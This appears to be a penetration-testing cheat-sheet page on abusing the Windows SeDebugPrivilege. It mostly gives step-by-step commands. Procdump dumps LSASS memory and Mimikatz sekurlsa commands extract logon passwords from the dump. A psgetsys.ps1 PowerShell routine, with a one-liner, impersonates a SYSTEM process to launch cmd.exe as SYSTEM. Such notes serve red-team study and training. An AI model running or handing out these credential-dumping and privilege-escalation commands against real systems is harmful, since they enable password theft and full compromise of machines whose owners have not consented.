Skip to main content

SeDebugPrivilege

SeDebugPrivilege allows a process to access and manipulate other processes, even those running as SYSTEM. This privilege is often abused in privilege escalation by injecting code, dumping credentials (e.g., LSASS), or modifying security tokens. Attackers can use tools like Mimikatz or Process Hacker to exploit it. If enabled for a low-privileged user, it can lead to full system compromise.

Dump LSASS using Procdump & Load into Mimikatz

procdump.exe -accepteula -ma lsass.exe lsass.DMP

# Load it in Mimikatz
mimikatz.exe
mimikatz> privilege::debug
mimikatz> log ## Good idea to use it
mimikatz> sekurlsa::minidump lsass.DMP
mimikatz> sekurlsa::logonpasswords

# OR use PYPYKATZ from attack-host.

More at:

RCE as SYSTEM

The SeDebugPrivilege can be used to gain Remote Code Execution (RCE) as SYSTEM by manipulating processes and inheriting elevated tokens from a SYSTEM-level process. The basic idea is to launch a child process that inherits the token of the parent process, which is running with SYSTEM privileges. By leveraging SeDebugPrivilege, we can alter the system's normal behavior and execute commands with SYSTEM rights.

Exploit

  1. Use tasklist /svc command to locate SYSTEM level process along with it's PID.
  2. Use psgetsystem to impersonate the SYSTEM privileges of the identified parent process and launch a command as SYSTEM.
## USING TASKLIST
tasklist /svc

## Using PowerShell
Get-WmiObject Win32_Process | Where-Object { $_.GetOwner().User -eq 'SYSTEM' } | Select-Object ProcessId, Name
Get-Process | Where-Object { $_.StartInfo.Environment["USERNAME"] -eq "SYSTEM" } | Select-Object Id, ProcessName

## Once, we locate the PID of SYSTEM Pemission Process 
# Download the psgetsys.ps1 scipt to target system

# Import it
. .\psgetsys.ps1

# Run the psgetsys.ps1 script
ImpersonateFromParentPid -ppid <parentpid> -command <command to execute> -cmdargs <command arguments>
ImpersonateFromParentPid -ppid 612 -command "C:\Windows\System32\cmd.exe" -cmdargs ""

## One Liner to get PID and run cmd as SYSTEM
$systemPid = (Get-Process | Where-Object { ($_ | Get-WmiObject -Class Win32_Process -Filter "ProcessId = $($_.Id)").GetOwner().User -eq "SYSTEM" }).Id; ImpersonateFromParentPid -ppid $systemPid -command <command_to_execute> -cmdargs <command_arguments>